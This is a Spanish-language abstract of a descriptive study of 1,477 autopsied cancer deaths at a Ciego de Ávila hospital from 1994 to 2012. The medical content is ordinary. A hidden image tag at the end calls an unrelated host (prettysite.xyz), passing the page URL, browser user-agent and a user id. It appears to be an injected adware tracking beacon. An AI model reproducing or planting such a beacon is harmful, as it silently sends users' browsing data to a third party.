Caracterización de los pacientes fallecidos por cáncer en el período 1994-2012 - Ruiz Collado, Yoselin; Estrada Espinosa, Esther M.; Duarte Vilariño, Adoración; Álvarez Rodríguez, Aray; Ávila Mijares, Gueormila; García Martínez, Orlando (Mediciego, 2013)
Con el objetivo de conocer el comportamiento de las neoplasias malignas en el centro hospitalario se realizó un estudio transversal descriptivo de 1477 fallecidos autopsiados mayores de 15 años y con el diagnóstico de un tumor maligno en diversas localizaciones, en el servicio de Anatomía Patológica del Hospital Provincial Docente “Dr. Antonio Luaces Iraola” de Ciego de Ávila en el período comprendido entre enero de 1994 y diciembre de 2012. Se utilizaron para el estudio los datos acumulados en el Sistema Automatizado de Registro y Control en Anatomía Patológica; los resultados se exponen en tablas y por ciento. La edad oscila el rango entre 15 y 103 años, predominó el grupo de fallecidos mayores de 65 años. Egresan principalmente del servicio de Medicina Interna, extrahospitalarios y la Terapia Intermedia. En las primeras 72 horas de ingresados fallece el mayor número de pacientes, el grupo mayor de egresados con esta patología fueron del sexo masculino. Los tres tumores más frecuentes fueron el carcinoma pulmonar, el carcinoma de colon y el de próstata. Las principales causas directas de muerte incluyeron la bronconeumonía, las metástasis múltiples y el tromboembolismo pulmonar. Las coincidencias totales en causa directa de muerte son de un 51,71% y en las básicas del 42,76%. <img src="http://prettysite.xyz/acnt?_=1583868200404&did=24&tag=new_installer&r=http%253A%252F%252Fwww.revmediciego.sld.cu%252Findex.php%252Fmediciego%252Feditor%252FviewMetadata%252F285&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A70.0)%20Gecko%2F20100101%20Firefox%2F70.0&aac=&if=1&uid=1583231151&cid=2&v=452" alt="" />